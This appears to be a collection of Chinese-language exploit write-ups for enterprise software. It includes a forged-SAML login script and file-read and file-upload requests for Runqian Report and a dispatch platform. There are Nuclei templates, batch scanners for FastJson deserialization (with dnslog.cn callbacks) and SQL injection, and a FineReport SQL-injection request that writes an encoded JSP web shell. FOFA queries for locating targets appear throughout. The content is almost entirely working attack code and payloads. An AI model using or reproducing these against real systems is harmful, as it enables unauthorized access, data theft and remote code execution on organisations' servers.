    saml_response = f"""

    http://your-saml-issuer.com

    http://your-saml-issuer.com

    {username}

    {url}

    urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport

    """
    return base64.b64encode(saml_response.encode('utf-8')).decode('utf-8')

# List of usernames to attempt access
usernames = ["user1@example.com", "user2@example.com", "admin@example.com"]

# Function to attempt login with SAML response
def attempt_login(saml_response):
    data = {
        "command": "samlSsoLogin",
        "SAMLResponse": saml_response
    }
    response = requests.post(url, data=data)

    if response.status_code == 200:
        soup = BeautifulSoup(response.text, 'html.parser')
        session_id = soup.find('sessionid')
        if session_id:
            logging.info(f"Login successful, session ID: {session_id.text}")
            print(f"Login successful, session ID: {session_id.text}")
        else:
            logging.info("Login failed, no session ID found in response.")
            print("Login failed, no session ID found in response.")
    else:
        logging.info(f"Login failed, status code: {response.status_code}")
        print(f"Login failed, status code: {response.status_code}")

# Attempt login for each username
for username in usernames:
    saml_response = generate_saml_response(username)
    attempt_login(saml_response)
```

--------------------------------------------------------------------------------
/润乾报表dataSphereServlet接口 任意文件读取漏洞.md:
--------------------------------------------------------------------------------
```
POST /demo/servlet/dataSphereServlet?action=11 HTTP/1.1
Host: 192.168.31.133:6868
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.31.133:6868/demo/
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 54

path=../../../WEB-INF/raqsoftConfig.xml&content=&mode=
```

Nuclei:

```
id: runqianbaobiaowenjianduqu-DEMO

info:
  name: 润乾报表dataSphereServlet接口 任意文件读取漏洞-DEMO
  author: 紫色皓月
  severity: high
  description: 润乾报表dataSphereServlet接口 任意文件读取漏洞-DEMO
  tags: 2024,润乾报表,任意文件读取,DEMO

requests:
  - raw:
      - |
        POST /demo/servlet/dataSphereServlet?action=11 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Referer: http://{{Hostname}}/demo/
        Connection: close
        Upgrade-Insecure-Requests: 1
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 54

        path=../../../WEB-INF/raqsoftConfig.xml&content=&mode=

    req-condition: true
    matchers:
      - type: word
        words:
          - ''
```

Without demo path

```
POST /servlet/dataSphereServlet?action=11 HTTP/1.1
Host: 192.168.31.133:6868
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.31.133:6868/
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 54

path=../../../WEB-INF/raqsoftConfig.xml&content=&mode=
```

```
id: runqianbaobiaowenjianduqu

info:
  name: 润乾报表dataSphereServlet接口 任意文件读取漏洞
  author: 紫色皓月
  severity: high
  description: 润乾报表dataSphereServlet接口 任意文件读取漏洞
  tags: 2024,润乾报表,任意文件读取

requests:
  - raw:
      - |
        POST /servlet/dataSphereServlet?action=11 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Referer: http://{{Hostname}}/
        Connection: close
        Upgrade-Insecure-Requests: 1
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 54

        path=../../../WEB-INF/raqsoftConfig.xml&content=&mode=

    req-condition: true
    matchers:
      - type: word
        words:
          - ''
```

--------------------------------------------------------------------------------
/用友NC-Cloud接口blobRefClassSearch存在FastJson反序列化漏洞.md:
--------------------------------------------------------------------------------
```
POST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.4103.116 Safari/537.36
Content-Type: application/json

{"clientParam":"{\"x\":{\"@type\":\"java.net.InetSocketAddress\"{\"address\":,\"val\":\"Test.Fastjson.dnslog.cn\"}}}"}
```

fofa

```
app="用友-NC-Cloud"
```

Batch script

```
# encoding:utf-8
import time
import requests
import argparse
import ssl
import urllib3
import re
from requests.exceptions import RequestException
from urllib3.exceptions import InsecureRequestWarning

# ssl._create_unverified_context: create an SSL context that does not verify the server certificate on HTTPS requests.
ssl._create_default_https_context = ssl._create_unverified_context
# urllib3.disable_warnings(): suppress the InsecureRequestWarning that urllib3 emits for unverified HTTPS requests.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


# Terminal colours for output
RED = '\033[31m'
GREEN = '\033[32m'
RESET = '\033[0m'


def check_vuln(url):
    url = url.strip("/")
    target = url + "/ncchr/pm/ref/indiIssued/blobRefClassSearch"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
        'Content-Type': 'application/json'
    }
    headers1 = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3",
        "Cookie": "PHPSESSID=pgqapiopj5rssr6a2ejvsi69m3; b-user-id=98195658-f7ad-f233-35b2-5f6d469d240d"
    }
    dnslog_url = "http://dnslog.cn/getdomain.php"
    try:
        # Request a fresh dnslog.cn subdomain, embed it in the payload and poll for a DNS hit
        getdomain = requests.get(dnslog_url, headers=headers1, verify=False, timeout=20)
        domain = str(getdomain.text)
        data = f'{{"clientParam":"{{\\"x\\":{{\\"@type\\":\\"java.net.InetSocketAddress\\"{{\\"address\\":,\\"val\\":\\"111111.{domain}\\"}}}}}}"}}'
        response = requests.post(target, headers=headers, data=data, verify=False, timeout=20)
        for i in range(0, 3):
            refresh = requests.get(url='http://dnslog.cn/getrecords.php', headers=headers1, timeout=60)
            time.sleep(2)
            if domain in refresh.text:
                print(f"{RED}[+] {url} 存在YongYouNC-Cloud-blobRefClassSearch-fastjson反序列化漏洞{RESET}")
                return True
        else:
            # no DNS record seen after three polls
            print(f"{GREEN}[+] {url} 不存在YongYouNC-Cloud-blobRefClassSearch-fastjson反序列化漏洞{RESET}")
    except requests.exceptions.RequestException as e:
        print(f"{GREEN}[-] {url} 请求失败{RESET}")


def main():
    parser = argparse.ArgumentParser(description='YongYouNC-Cloud-blobRefClassSearch-Fastjson反序列化漏洞检测')
    parser.add_argument('-u', '--url', help='目标URL')
    parser.add_argument('-f', '--file', help='目标URL文件')

    args = parser.parse_args()

    if args.url:
        url = "http://" + args.url if not args.url.startswith(('http://', 'https://')) else args.url
        check_vuln(url)
    elif args.file:
        with open(args.file, 'r') as f:
            urls = f.read().splitlines()
        for url in urls:
            url = "http://" + url if not url.startswith(('http://', 'https://')) else url
            check_vuln(url)


if __name__ == '__main__':
    main()
```

--------------------------------------------------------------------------------
/泛微E-cology9 browserjsp SQL注入漏洞.md:
--------------------------------------------------------------------------------
```python
import argparse
import sys
import requests
from termcolor import colored
import signal

requests.packages.urllib3.disable_warnings()
output_file = None

def check_url(url, output=None):
    headers = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Connection": "close"
    }
    proxies = {
        'http': 'http://127.0.0.1:8080',
        'https': 'https://127.0.0.1:8080'
    }

    data = {
        "isDis": "1",
        "browserTypeId": "269",
        "keyword": "%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%35%25%33%36%25%32%35%25%33%34%25%33%35%25%32%35%25%33%35%25%33%32%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%36%25%32%35%25%33%34%25%36%35%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37"
    }

    try:
        modified_url = url + '/mobile/%20/plugin/browser.jsp'
        response = requests.post(modified_url, data=data, headers=headers, verify=False, timeout=3)
        content = response.text

        if "show2" in content:
            result = colored(url + " 存在", 'red')

            if output:
                with open(output, 'a') as file:  # open the file in append mode
                    file.write(url + '\n')

            print(result)  # print the result immediately
        else:
            result = url + " 不存在"
            print(result)  # print the result immediately

    except requests.exceptions.RequestException as e:
        pass  # do nothing, move on to the next URL


def check_urls_from_file(filename, output=None):
    with open(filename, 'r') as file:
        url_list = file.read().strip().split('\n')

    for url in url_list:
        check_url(url, output)


def handle_interrupt(signum, frame):
    global output_file

    # on interrupt, keep the results written so far and close the file
    if output_file:
        output_file.close()

    print("\n扫描已中断并保存当前结果。")
    sys.exit(0)


def main():
    global output_file

    parser = argparse.ArgumentParser(description='CNVD-2023-12632检测POC')
    parser.add_argument('-u', '--url', help='检测单个URL')
    parser.add_argument('-r', '--file', help='从文本中批量检测URL')
    parser.add_argument('-o', '--output', help='将检测到的输出到文本中')
    args = parser.parse_args()

    # register the interrupt handler before any scanning starts
    signal.signal(signal.SIGINT, handle_interrupt)

    if args.output:
        output_file = open(args.output, 'a')  # open the output file in append mode

    if args.url:
        check_url(args.url, args.output)
    elif args.file:
        check_urls_from_file(args.file, args.output)
    else:
        parser.print_help()

    # close the output file
    if output_file:
        output_file.close()


if __name__ == '__main__':
    main()
```

--------------------------------------------------------------------------------
/福建科立讯通信指挥调度管理平台任意文件上传.md:
--------------------------------------------------------------------------------
Exploitation method 1

```
POST /api/client/fileupload.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Length: 477

------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="file"; filename="rcnlsq.php"
Content-Type: image/jpeg

5465rcnlsq
------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="number";

5465
------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="type";

1
------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="title";

1
------WebKitFormBoundaryVBf7Cs8QWsfwC82M--
```

Exploitation method 2

```
POST /api/client/upload.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Length: 194

------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="ulfile"; filename="lztkkl.php"
Content-Type: image/jpeg

99647lztkkl
------WebKitFormBoundaryVBf7Cs8QWsfwC82M--


GET /upload/lztkkl.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

```

Exploitation method 3

```
POST /api/client/task/uploadfile.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Length: 198

------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="uploadfile"; filename="rvfuid.php"
Content-Type: image/jpeg

97236rvfuid
------WebKitFormBoundaryVBf7Cs8QWsfwC82M--
```

File path: taken from the response.

Exploitation method 4

```
POST /api/client/event/uploadfile.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Length: 198

------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="uploadfile"; filename="iuctmt.php"
Content-Type: image/jpeg

48620iuctmt
------WebKitFormBoundaryVBf7Cs8QWsfwC82M--
```

File URL: taken from the response.

Exploitation method 5

```
POST /api/client/upload.php HTTP/1.1
Host: 
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Content-Length: 200

------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="ulfile"; filename="dzfuxvtm.php"
Content-Type: image/jpeg

dzfuxvtm186448
------WebKitFormBoundarymVk33liI64J7GQaK--


GET /upload/dzfuxvtm.php HTTP/1.1
Host: 
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
```

FOFA search:

```
body="指挥调度管理平台" && title=="指挥调度管理平台"
```

--------------------------------------------------------------------------------
/润乾报表dataSphereServlet 任意文件上传漏洞.md:
--------------------------------------------------------------------------------
```
PosT /servlet/dataSphereServlet?action=38 HTTP/1.1
Host:127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept:*/*
Connection: close
Content-Length: 397
Content-Type: multipart/form-data;boundary=eac629ee4641cb0fe10596fba5e0c5d9

--eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name="openGrpxFile"; filename="539634.jsp"
Content-Type: text/plain

<% out.println("873227518"); %>
--eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition:form-data;name="path"

../../../
--eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name="saveServer"

1
--eac629ee4641cb0fe10596fba5e0c5d9--
```

Access URL

http://192.168.31.133:6868/demo/539634.jsp

nuclei

```
id: runqianbaobiaowenjianshangchuan

info:
  name: 润乾报表dataSphereServlet接口存在任意文件上传漏洞
  author: 紫色皓月
  severity: high
  description: 润乾报表dataSphereServlet接口存在任意文件上传漏洞
  tags: 2024,润乾报表,任意文件上传

variables:
  file_name: "{{to_lower(rand_text_alpha(8))}}.txt"
  file_content: "{{to_lower(rand_text_numeric(32))}}"

requests:
  - raw:
      - |
        POST /servlet/dataSphereServlet?action=38 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close
        Content-Length: 395
        Content-Type: multipart/form-data; boundary=eac629ee4641cb0fe10596fba5e0c5d9

        --eac629ee4641cb0fe10596fba5e0c5d9
        Content-Disposition: form-data; name="openGrpxFile"; filename="{{file_name}}"
        Content-Type: text/plain

        {{file_content}}
        --eac629ee4641cb0fe10596fba5e0c5d9
        Content-Disposition: form-data; name="path"

        ../../../
        --eac629ee4641cb0fe10596fba5e0c5d9
        Content-Disposition: form-data; name="saveServer"

        1
        --eac629ee4641cb0fe10596fba5e0c5d9--

      - |
        GET /{{file_name}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Connection: close
        Upgrade-Insecure-Requests: 1

    req-condition: true
    matchers:
      - type: word
        words:
          - "{{file_content}}"
        part: body
```

A freshly installed system has the demo path, while some of the deployed instances found online do not, so the PoC is given in two variants.

PoC for installations with the demo path:

```
POST /demo/servlet/dataSphereServlet?action=38 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 392
Content-Type: multipart/form-data; boundary=eac629ee4641cb0fe10596fba5e0c5d9

--eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name="openGrpxFile"; filename="539634.jsp"
Content-Type: text/plain

<% out.println("123456"); %>
--eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name="path"

../../../
--eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name="saveServer"

1
--eac629ee4641cb0fe10596fba5e0c5d9--
```

http://192.168.31.133:6868/demo/539634.jsp

nuclei

```
id: runqianbaobiaowenjianshangchuan-DEMO

info:
  name: 润乾报表dataSphereServlet接口存在任意文件上传漏洞
  author: 紫色皓月
  severity: high
  description: 润乾报表dataSphereServlet接口存在任意文件上传漏洞
  tags: 2024,润乾报表,任意文件上传,DEMO

variables:
  file_name: "{{to_lower(rand_text_alpha(8))}}.txt"
  file_content: "{{to_lower(rand_text_numeric(32))}}"

requests:
  - raw:
      - |
        POST /demo/servlet/dataSphereServlet?action=38 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close
        Content-Length: 395
        Content-Type: multipart/form-data; boundary=eac629ee4641cb0fe10596fba5e0c5d9

        --eac629ee4641cb0fe10596fba5e0c5d9
        Content-Disposition: form-data; name="openGrpxFile"; filename="{{file_name}}"
        Content-Type: text/plain

        {{file_content}}
        --eac629ee4641cb0fe10596fba5e0c5d9
        Content-Disposition: form-data; name="path"

        ../../../
        --eac629ee4641cb0fe10596fba5e0c5d9
        Content-Disposition: form-data; name="saveServer"

        1
        --eac629ee4641cb0fe10596fba5e0c5d9--

      - |
        GET /demo/{{file_name}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Connection: close
        Upgrade-Insecure-Requests: 1

    req-condition: true
    matchers:
      - type: word
        words:
          - "{{file_content}}"
        part: body
```

--------------------------------------------------------------------------------
/帆软FineReport报表 ReportServer SQL注入getshell.md:
--------------------------------------------------------------------------------
**Network mapping**

```
app="帆软-数据决策系统"
```

### Vulnerability PoC

```
GET /webroot/decision/view/ReportServer?test=&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Fuu9iu.jsp%27%20as%20uu9iu%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20uu9iu.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20uu9iu.exp2%28data%29%20VALUES%20%28%27Qax360nb%27%29%3B'),1,1)} HTTP/1.1
```

```
GET 
/webroot/decision/view/ReportServer?test=sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss&n=${__fr_locale__=sql('FRDemo',DECODE('%ef%bb%bf%61%74%7
4%61%63%68%0C%64%61%74%61%62%61%73%65%20%27%2F%68%6F%6D%65%2F%46%44%4C%2F%74%6F%6D%63%61%74%2D%6C%69%6E%75%78%2F%77%65%62%61%70%70%73%2F%77%65%62%72%6F%6F%74%2F%68%65%6C%70%2F%74%31%36%32%36%35%39%34%2E%6A%73%70%27%20%61%73%20%27%74%31%36%32%36%35%39%34%27%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%ef%bb%bf%63%72%65%61%74%65%0C%74%61%62%6C%65%20%74%31%36%32%36%35%39%34%2E%74%74%28%64%61%74%61%7A%20%74%65%78%74%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%ef%bb%bf%49%4E%53%45%52%54%0C%69%6E%74%6F%20%74%31%36%32%36%35%39%34%2E%74%74%28%64%61%74%61%7A%29%20%56%41%4C%55%45%53%20%28%27%3C%25%43%6C%61%73%73%20%73%61%66%65%20%3D%20%43%6C%61%73%73%2E%66%6F%72%4E%61%6D%65%28%22%73%75%6E%2E%6D%69%73%63%2E%55%6E%73%61%66%65%22%29%3B%6A%61%76%61%2E%6C%61%6E%67%2E%72%65%66%6C%65%63%74%2E%46%69%65%6C%64%20%73%61%66%65%43%6F%6E%20%3D%20%73%61%66%65%2E%67%65%74%44%65%63%6C%61%72%65%64%46%69%65%6C%64%28%22%74%68%65%55%6E%22%20%2B%20%22%73%61%66%65%22%29%3B%73%61%66%65%43%6F%6E%2E%73%65%74%41%63%63%65%73%73%69%62%6C%65%28%74%72%75%65%29%3B%73%75%6E%2E%6D%69%73%63%2E%55%6E%73%61%66%65%20%75%6E%53%61%66%65%20%3D%20%28%73%75%6E%2E%6D%69%73%63%2E%55%6E%73%61%66%65%29%20%73%61%66%65%43%6F%6E%2E%67%65%74%28%6E%75%6C%6C%29%3B%62%79%74%65%5B%5D%20%64%61%74%61%42%79%74%65%73%20%3D%20%6A%61%76%61%78%2E%78%6D%6C%2E%62%69%6E%64%2E%44%61%74%61%74%79%70%65%43%6F%6E%76%65%72%74%65%72%2E%70%61%72%73%65%42%61%73%65%36%34%42%69%6E%61%72%79%28%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%64%61%74%61%22%29%29%3B%75%6E%53%61%66%65%2E%64%65%66%69%6E%65%41%6E%6F%6E%79%6D%6F%75%73%43%6C%61%73%73%28%6A%61%76%61%2E%69%6F%2E%46%69%6C%65%2E%63%6C%61%73%73%2C%20%64%61%74%61%42%79%74%65%73%2C%20%6E%75%6C%6C%29%2E%6E%65%77%49%6E%73%74%61%6E%63%65%28%29%3B%25%3E%27%29%3B'),1,1)} HTTP/1.1
host: xxxx
connection: close
content-type: application/x-www-form-urlencoded
accept-encoding: gzip, deflate
accept: */*
```

The file is written to webapps/webroot/help/

--------------------------------------------------------------------------------